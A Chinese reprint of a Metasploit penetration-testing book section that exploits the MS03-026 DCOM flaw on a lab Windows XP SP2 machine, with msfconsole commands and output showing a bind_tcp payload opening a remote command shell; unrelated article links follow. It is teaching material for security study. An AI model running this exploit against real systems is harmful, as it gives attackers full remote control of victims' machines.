《Metasploit渗透测试手册》—第3章3.4节绑定远程访问目标机器的shell

简介:

本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第3章3.4节绑定远程访问目标机器的shell,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。

3.4 绑定远程访问目标机器的shell
Metasploit渗透测试手册
在前面内容中,分析了怎样对Windows SP2进行攻击渗透,并在其上添加新的用户账号,但是在执行该漏洞利用代码之后,连接也终止了。在本节中,将实现向目标机器绑定shell,以便建立与目标机器的远程连接并对其进行远程控制。工作过程和前面讲过的类似,使用不同的攻击载荷,执行后将在目标机器上打开远程连接shell。

准备
从启动msfconsole开始,目标与在Windows XP SP2上进行渗透测试的目标相同,使用的漏洞同样也是dcom漏洞,区别是使用不同的攻击载荷,本次选用的攻击载荷可以生成绑定到目标主机的shell。

怎样实现
若要向目标主机绑定shell,需要执行如下几个步骤。

(1)针对目标机器,选择dcom漏洞利用代码,设置不同的参数,然后选择攻击载荷。

msf > use exploit/windows/dcerpc/ms03_026_dcom 
msf  exploit(ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                      yes       The target address
   RPORT  135                yes        The target port
Exploit target:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf  exploit(ms03_026_dcom) > set RHOST 192.168.56.102
RHOST => 192.168.56.102

(2)漏洞利用代码相关参数设置完成后,接下来就是攻击载荷。使用show payloads命令可以列出所有可用的攻击载荷。选择windows/shell/bind_tcp,该攻击载荷将在目标机器的4444端口(默认情况)打开TCP连接,并向攻击者提供命令shell。

msf  exploit(ms03_026_dcom) > set PAYLOAD windows/shell/bind_tcp 
PAYLOAD => windows/shell/bind_tcp

(3)使用show options命令,并设置其他相关参数,例如RHOST。还可以修改缺省的端口号,参数设置完成后,便可以执行该漏洞利用代码。下面展示的是代码执行后的输出情况。

msf  exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.56.101:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.56.102
[*] Command shell session 1 opened (192.168.56.101:4444 -> 
192.168.56.102:1052) at 2011-10-31 01:55:42 +0530
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

从以上信息可以看出,漏洞利用代码成功执行,新的命令行提示符已经在msfconsole中启动,攻击者可以利用这一新的会话远程获取对目标机器的完全访问权限。如果需要退出该会话,可以使用exit命令。

读者现在可能已经认识到Metasploit中攻击载荷的强大,为更好地理解其攻击载荷的功能,强烈建议读者对其进行更多的尝试。

怎样工作
Dcom漏洞利用代码的工作原理和前面讲过的是相同的。bindtcp的工作过程涉及后面章节将要介绍的一些概念,以便对其工作过程有更好的理解。读者也可以查阅该攻击载荷的ruby代码,见/pentest/exploits/framework3/modules/payloads/stagers/windows/bind tcp.rb。

更多
接下来要学习怎样通过shell对目标主机进行控制。

实现对目标的完全控制
建立与目标机器的shell连接,然后使用命令行提示符对目标机器进行完整的访问和控制。可使用一些常用的DOS命令对目标机器进行探索,包括目录列表、文件与文件夹复制、创建用户代理等一些基本操作。

本文仅用于学习和交流目的,不代表异步社区观点。非商业转载请注明作译者、出处,并保留本文的原始链接。

相关文章
|
11月前
|
测试技术 UED
测试目标
测试目标
127 6
|
11月前
|
缓存 Shell Linux
【Shell 命令集合 链接器(linker)工具】Linux ld命令 将目标文件与库链接为可执行文件或库文件
【Shell 命令集合 链接器(linker)工具】Linux ld命令 将目标文件与库链接为可执行文件或库文件
335 0
|
11月前
|
网络协议 Shell Linux
【Shell 命令集合 网络通讯 】⭐⭐⭐Linux 测试与目标主机之间的网络连接ping 命令 使用指南
【Shell 命令集合 网络通讯 】⭐⭐⭐Linux 测试与目标主机之间的网络连接ping 命令 使用指南
328 1
|
6月前
|
机器学习/深度学习 并行计算 数据可视化
目标分类笔记(二): 利用PaddleClas的框架来完成多标签分类任务(从数据准备到训练测试部署的完整流程)
这篇文章介绍了如何使用PaddleClas框架完成多标签分类任务,包括数据准备、环境搭建、模型训练、预测、评估等完整流程。
404 0
|
6月前
|
机器学习/深度学习 数据采集 算法
目标分类笔记(一): 利用包含多个网络多种训练策略的框架来完成多目标分类任务(从数据准备到训练测试部署的完整流程)
这篇博客文章介绍了如何使用包含多个网络和多种训练策略的框架来完成多目标分类任务,涵盖了从数据准备到训练、测试和部署的完整流程,并提供了相关代码和配置文件。
172 0
目标分类笔记(一): 利用包含多个网络多种训练策略的框架来完成多目标分类任务(从数据准备到训练测试部署的完整流程)
|
11月前
|
安全 测试技术 网络架构
【专栏】编写网络设备割接方案的七个步骤,包括明确割接目标、收集信息、制定计划、设计流程、风险评估、准备测试环境和编写文档。
【4月更文挑战第28天】本文介绍了编写网络设备割接方案的七个步骤,包括明确割接目标、收集信息、制定计划、设计流程、风险评估、准备测试环境和编写文档。通过实际案例分析,展示了如何成功完成割接,确保业务连续性和稳定性。遵循这些步骤,可提高割接成功率,为公司的网络性能和安全提供保障。
980 0
|
6月前
|
机器学习/深度学习 人工智能 并行计算
StableDiffusion-01本地服务器部署服务 10分钟上手 底显存 中等显存机器 加载模型测试效果 附带安装指令 多显卡 2070Super 8GB*2
StableDiffusion-01本地服务器部署服务 10分钟上手 底显存 中等显存机器 加载模型测试效果 附带安装指令 多显卡 2070Super 8GB*2
104 0
|
8月前
|
调度
项目环境测试问题之单机调度会导致项目环境大部分的机器被闲置如何解决
项目环境测试问题之单机调度会导致项目环境大部分的机器被闲置如何解决
|
9月前
|
测试技术
软件交付问题之为什么测试用例不能全由开发人员告知测试人员
软件交付问题之为什么测试用例不能全由开发人员告知测试人员
|
10月前
|
SQL DataWorks 安全
DataWorks产品使用合集之在进行测试数据集成时,目标库的数据是源库数据的3倍量,是什么导致的
DataWorks作为一站式的数据开发与治理平台,提供了从数据采集、清洗、开发、调度、服务化、质量监控到安全管理的全套解决方案,帮助企业构建高效、规范、安全的大数据处理体系。以下是对DataWorks产品使用合集的概述,涵盖数据处理的各个环节。
DataWorks产品使用合集之在进行测试数据集成时,目标库的数据是源库数据的3倍量,是什么导致的

热门文章

最新文章